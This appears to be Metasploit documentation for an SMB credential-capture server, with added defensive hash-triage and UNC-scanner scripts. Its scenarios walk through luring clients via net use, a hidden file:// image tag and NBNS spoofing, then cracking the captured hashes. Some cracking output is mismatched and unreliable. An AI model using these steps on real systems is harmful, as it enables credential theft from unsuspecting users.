This module creates a mock SMB server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`.
Supports SMBv1, SMBv2, & SMBv3 and captures NTLMv1 & NTLMv2 hashes.
## Verification Steps
Microsoft provides an article on how to detect, disable, and enable SMB in various versions
[here](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server), which can be useful during testing.
1. Start msfconsole
2. Connect DB
3. Do: `use auxiliary/server/capture/smb`
4. Do: `run`
5. Connect to the above server with your SMB client of choice
6. Observe the hash being captured
7. `creds`
8. Check that the hash has been stored in the DB correctly
9. `hosts`
10. Check that the client IP has been added to the DB
## Options
**CAINPWFILE**

A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 hashes.

**CHALLENGE**

The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.
The format is `1122334455667788`.

**JOHNPWFILE**

A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes will be stored in separate files.
For example, the filename `john` will produce two files, `john_netntlm` and `john_netntlmv2`.

**DOMAIN**

The domain name used during the SMB exchange.

**TIMEOUT**

Seconds that the server socket will wait for a response after the client has initiated communication.
This only applies to the server waiting on the client to respond with [a type3 message](http://davenport.sourceforge.net/ntlm.html#theType3Message).
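The two files that JOHNPWFILE writes (`netntlm` for NTLMv1, `netntlmv2` for NTLMv2) are colon-separated lines, and the verification steps above ask you to confirm that what landed in the database matches what was captured. The following Python script is an added example, not part of this module or of the Metasploit framework: it parses capture lines in either format, applies the same 16-hex-character validity rule as the CHALLENGE option, decodes the client timestamp and AV_PAIR names from an NTLMv2 blob, and produces a triage summary that separates NTLMv1 entries (the weaker, DES-based response that a defender should treat as a downgrade finding) from NTLMv2 ones and flags lines whose server challenge does not match the one you configured. The NTLMv1 sample line is the one captured in the Windows XP scenario on this page; the NTLMv2 sample reuses the user, server challenge and NTProofStr from the smbclient scenario with a blob constructed for this example, since the page's own blob is truncated. The field names `client_time`, `client_challenge` and the `triage` report keys are choices made here, not module output.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# AV_PAIR ids inside the NTLMv2 blob whose values are UTF-16LE strings (MS-NLMP 2.2.2.1).
AV_STRING_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
                 4: "DnsDomainName", 5: "DnsTreeName"}

# Constructed sample input. SAMPLE_NTLMV1 is the line captured in the Windows XP scenario of
# this page. SAMPLE_NTLMV2 reuses the user, server challenge and NTProofStr of the smbclient
# scenario with a blob built for this example: timestamp 2021-08-16 00:00 UTC, client nonce
# 1122334455667788 and one AV_PAIR NbDomainName=WORKGROUP.
SAMPLE_NTLMV1 = ("Administrator::ADAM-9256FBF58E:"
                 "440a272a2f9e82c9ec09d91931fa04152cef3cac3a5563d7:"
                 "4a919f3243d06d6c9c14ebff4639455e294de86cbe2bb953:66092f7f74758d2f")
SAMPLE_NTLMV2 = ("kali::WORKGROUP:6ca4b2b2e5171437:f2857b13094f4a758bc448e1801dd86d:"
                 "0101000000000000" "00c0faa73192d701" "1122334455667788" "00000000"
                 "02001200" "57004f0052004b00470052004f0055005000" "00000000" "00000000")


def is_valid_challenge(value):
    """The CHALLENGE option's rule: exactly 16 hexadecimal characters (8 bytes)."""
    return len(value) == 16 and HEX_RE.match(value) is not None


@dataclass
class CapturedHash:
    user: str
    domain: str
    version: str             # "NTLMv1" or "NTLMv2"
    challenge: str           # server challenge, 16 lowercase hex characters
    detail: dict = field(default_factory=dict)


def decode_ntlmv2_blob(blob_hex):
    """Extract client timestamp, client nonce and AV_PAIR names from an NTLMv2 blob."""
    raw = bytes.fromhex(blob_hex)
    out = {}
    if len(raw) < 28 or raw[0] != 1:        # RespType must be 1; anything else is not a blob
        return out
    filetime = int.from_bytes(raw[8:16], "little")          # 100 ns ticks since 1601-01-01
    out["client_time"] = FILETIME_EPOCH + timedelta(microseconds=filetime // 10)
    out["client_challenge"] = raw[16:24].hex()
    pos = 28                                                  # 4 reserved bytes precede AV_PAIRs
    while pos + 4 <= len(raw):
        av_id = int.from_bytes(raw[pos:pos + 2], "little")
        av_len = int.from_bytes(raw[pos + 2:pos + 4], "little")
        if av_id == 0:                                        # MsvAvEOL terminates the list
            break
        if av_id in AV_STRING_IDS:
            out[AV_STRING_IDS[av_id]] = raw[pos + 4:pos + 4 + av_len].decode("utf-16-le", "replace")
        pos += 4 + av_len
    return out


def parse_capture_line(line):
    """Parse one JOHNPWFILE line; the field lengths tell the two formats apart."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError(f"not a netntlm/netntlmv2 line: {line.strip()!r}")
    user, _, domain, f1, f2, f3 = parts
    if not all(HEX_RE.match(f) for f in (f1, f2, f3)):
        raise ValueError("non-hex field in capture line")
    # netntlm:   user::domain:LM_response(48 hex):NT_response(48 hex):server_challenge(16 hex)
    if len(f1) == 48 and len(f2) == 48 and len(f3) == 16:
        return CapturedHash(user, domain, "NTLMv1", f3.lower(), {"lm_response": f1, "nt_response": f2})
    # netntlmv2: user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob(>= 28 bytes)
    if len(f1) == 16 and len(f2) == 32 and len(f3) >= 56 and len(f3) % 2 == 0:
        return CapturedHash(user, domain, "NTLMv2", f1.lower(),
                            {"ntproofstr": f2, **decode_ntlmv2_blob(f3)})
    raise ValueError("field lengths match neither NTLMv1 nor NTLMv2")


def triage(lines, expected_challenge=None):
    """Summarise a capture file: accounts per NTLM version, entries whose server challenge
    differs from the configured CHALLENGE (so were not produced by this server instance),
    and lines that could not be parsed."""
    report = {"NTLMv1": [], "NTLMv2": [], "challenge_mismatch": [], "unparsed": []}
    for line in lines:
        if not line.strip():
            continue
        try:
            captured = parse_capture_line(line)
        except ValueError:
            report["unparsed"].append(line.strip())
            continue
        account = f"{captured.domain}\\{captured.user}"
        report[captured.version].append(account)
        if expected_challenge and captured.challenge != expected_challenge.lower():
            report["challenge_mismatch"].append(account)
    return report


if __name__ == "__main__":
    import sys
    lines = []
    for path in sys.argv[1:]:               # e.g. /tmp/john_netntlm /tmp/john_netntlmv2
        with open(path) as fh:
            lines.extend(fh)
    for key, entries in triage(lines or [SAMPLE_NTLMV1, SAMPLE_NTLMV2]).items():
        print(f"{key:18}: {entries}")
```

Run it with the two JOHNPWFILE outputs as arguments, or with no arguments to see the embedded samples. Passing the CHALLENGE value you set as `expected_challenge` is a cheap way to tell lines written by this server run apart from older entries in a reused file, and the decoded `client_time` and `NbDomainName` from the NTLMv2 blob give a defender reviewing a capture the client's clock and NetBIOS domain without any cracking.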
## Scenarios
### Linux Connection via smbclient
Kali 2021.1 with `smbclient 4.13.5` installed.
Server:
```
msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client : 192.168.1.48
[SMB] NTLMv2-SSP Username : WORKGROUP\kali
[SMB] NTLMv2-SSP Hash : kali::WORKGROUP:6ca4b2b2e5171437:f2857b13094f4a758bc448e1801dd86d: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
```
Client:
```
root@Kali:~# smbclient //192.168.89.1/fake
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_LOGON_FAILURE
```
Crack the hash (this hash is NTLMv2):
```
# cat /tmp/john
kali::WORKGROUP:6ca4b2b2e5171437:f2857b13094f4a758bc448e1801dd86d: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
# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jim (kali)
1g 0:00:00:00 DONE (2021-08-16 10:08) 5.555g/s 785066p/s 785066c/s 785066C/s katiekatie..charles14
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
### Windows XP via net use
Based off of [hackers-arise.com](https://web.archive.org/web/20210503073722/https://www.hackers-arise.com/post/2018/11/19/metasploit-basics-part-20-creating-a-fake-smb-server-to-capture-credentials)
The idea here is we have a shell on a Windows box where we can't `hashdump` due to user permissions.
However, we're able to do a `net use` to make an `SMB` connection back to our server to get the
user's hash, then hopefully crack it.
```
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
msf6 auxiliary(server/capture/smb) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>net use \\192.168.89.1 fake
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:440a272a2f9e82c9ec09d91931fa04152cef3cac3a5563d7:4a919f3243d06d6c9c14ebff4639455e294de86cbe2bb953:66092f7f74758d2f
Logon failure: unknown user name or bad password.
C:\Documents and Settings\test\Desktop>
```
We're now able to use John the Ripper to crack the password. As the above hash is NTLMv1, the format must be specified as `netlm`:
```
# cat /tmp/john_netntlm
Administrator::ADAM-9256FBF58E:440a272a2f9e82c9ec09d91931fa04152cef3cac3a5563d7:4a919f3243d06d6c9c14ebff4639455e294de86cbe2bb953:66092f7f74758d2f
# john /tmp/john_netntlm --format=netlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (netlm, LM C/R [DES 32/64])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
FAKE (test)
1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
Use the "--show --format=netlm" options to display all of the cracked passwords reliably
Session completed
```
### UNC in Websites Vector
One way to coax a user into creating an SMB connection is to embed it in a website.
First, create the website (we're using Kali for this) with the following content:
```html
<html>
<head>
<title>UNC Example</title>
</head>
<body>
<img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
</body>
</html>
```
This file, for the example, is in `/var/www/html/unc.html`.
Also of note, this could be done via XSS or other injection technique.
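The `file:////host/share` reference above is what makes the browser open an outbound SMB session, and as noted the same tag can arrive through XSS or another injection. Below is an added example in Python, not part of this module or of the Metasploit project: a scanner built on the standard library's `html.parser` that walks the URL-carrying attributes of a page and reports every UNC or remote `file:` reference, with the host it would authenticate to and whether the element is sized to zero pixels as in the page above. Reviewing served templates, user-supplied HTML or proxy captures with a check like this is one way to catch this vector before a client does. The sample page is constructed from the `unc.html` above plus ordinary references that must not be reported; local `file:///` paths and `localhost` references are deliberately ignored, and inline CSS `url()` or script-built references are out of scope.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Attributes through which a browser (or an Office/Windows shell component) fetches a resource.
URL_ATTRS = {"src", "href", "action", "data", "poster", "background", "codebase", "xlink:href"}

# Constructed sample page: the unc.html from this page plus benign references that must not fire.
SAMPLE_HTML = """<html>
<head>
<title>UNC Example</title>
<link rel="stylesheet" href="file:///C:/local/site.css">
</head>
<body>
<img src="/static/logo.png" width="120" height="40">
<a href="https://example.com/docs">docs</a>
<img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
</body>
</html>"""


def _split_host(body):
    """body is 'host/path' with forward slashes; (host, path), or None when there is no remote host."""
    host, _, path = body.partition("/")
    if not host or host.lower() == "localhost":
        return None
    return host, "/" + path


def unc_target(value):
    """Return (host, path) when an attribute value points at a remote SMB/UNC location.

    Recognised forms: \\\\host\\share\\file, file://host/share/file (two slashes then a host)
    and the Windows idiom file:////host/share/file (four or more slashes).
    file:///path has no host component, is a local file, and returns None.
    """
    raw = unquote(value.strip())
    if raw.startswith("\\\\"):
        return _split_host(raw[2:].replace("\\", "/"))
    if raw.lower().startswith("file:"):
        body = raw[5:].replace("\\", "/")
        slashes = len(body) - len(body.lstrip("/"))
        if slashes == 2 or slashes >= 4:
            return _split_host(body.lstrip("/"))
    return None


def _is_zero_size(value):
    """True for width/height values such as "0" or "0px"."""
    return value is not None and value.strip().lower().rstrip("px").strip() == "0"


class UncRefScanner(HTMLParser):
    """Collects every tag whose URL attribute resolves to a remote UNC target."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attr_map = {name.lower(): value for name, value in attrs}
        for name, value in attrs:
            if name.lower() not in URL_ATTRS or not value:
                continue
            target = unc_target(value)
            if target is None:
                continue
            self.findings.append({
                "line": self.getpos()[0],
                "tag": tag,
                "attr": name,
                "host": target[0],
                "path": target[1],
                "hidden": _is_zero_size(attr_map.get("width")) or _is_zero_size(attr_map.get("height")),
            })


def scan_html(text):
    """Return the list of UNC findings for an HTML document."""
    scanner = UncRefScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTML
    for f in scan_html(source):
        flag = " (zero-sized element)" if f["hidden"] else ""
        print(f"line {f['line']}: <{f['tag']} {f['attr']}> -> \\\\{f['host']}{f['path']}{flag}")
```

Run it as `python3 unc_scan.py page.html`, or with no argument to scan the embedded sample. The `hidden` flag exists because a legitimate image on an internal file share is at least visible; a zero-sized one whose only effect is the authentication round trip is the pattern this page demonstrates.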
Start the webserver:
```
service apache2 start
```
Server:
```
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 1.
[+] Server is running. Listening on 0.0.0.0:445
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:e588849d18b2a64c8fd6e26a755e5f5524ffb56c273553be:718bcfd52364e9abafc5af05ee5a60c4c068e7feda9cfe64:b3c8cdb98e907d1a
```
Client:
```
Browse to the webpage. This example is on Windows Server 2008r2 with Internet Explorer.
```
Crack the password:
```
# john /tmp/johnnbns_netntlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
adam (adam)
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed
```
### Spoofing NBNS
If the target(s) are on the local network, it's possible to conduct an `nbns` spoof to attract
additional SMB queries to your host. This scenario will utilize `auxiliary/spoof/nbns/nbns_response`
to conduct the spoofing. If a Windows user attempts to browse or mount a network name such as
`\\fake`, the `nbns` module will respond back with the set IP.
This is based on [hackingarticles.in](https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/).
Server side:
```
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/johnnbns
JOHNPWFILE => /tmp/johnnbns
msf6 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
[+] Server is running. Listening on 0.0.0.0:445
msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf6 auxiliary(spoof/nbns/nbns_response) > set spoofip 192.168.89.1
spoofip => 192.168.89.1
msf6 auxiliary(spoof/nbns/nbns_response) > set interface eth0
interface => eth0
msf6 auxiliary(spoof/nbns/nbns_response) > exploit
[*] Auxiliary module running as background job 1.
msf6 auxiliary(spoof/nbns/nbns_response) >
[*] NBNS Spoofer started. Listening for NBNS requests with REGEX ".*" ...
[+] 192.168.89.135 nbns - FAKE matches regex, responding with 192.168.89.1
[+] 192.168.89.135 nbns - FAKE matches regex, responding with 192.168.89.1
[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv1-SSP Client : 192.168.89.135
[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
[SMB] NTLMv1-SSP Hash : Administrator::ADAM-9256FBF58E:e588849d18b2a64c8fd6e26a755e5f5524ffb56c273553be:718bcfd52364e9abafc5af05ee5a60c4c068e7feda9cfe64:b3c8cdb98e907d1a
```
Victim:
```
Open Explorer and type \\fake
```
Finally, crack the password:
```
# john /tmp/johnnbns_netntlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
adam (adam)
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed
```
### Word Document UNC Injector
Another strategy is to create content that entices a user to open it and contains a UNC link,
thus creating an SMB connection. To accomplish this, we use `auxiliary/docx/word_unc_injector`.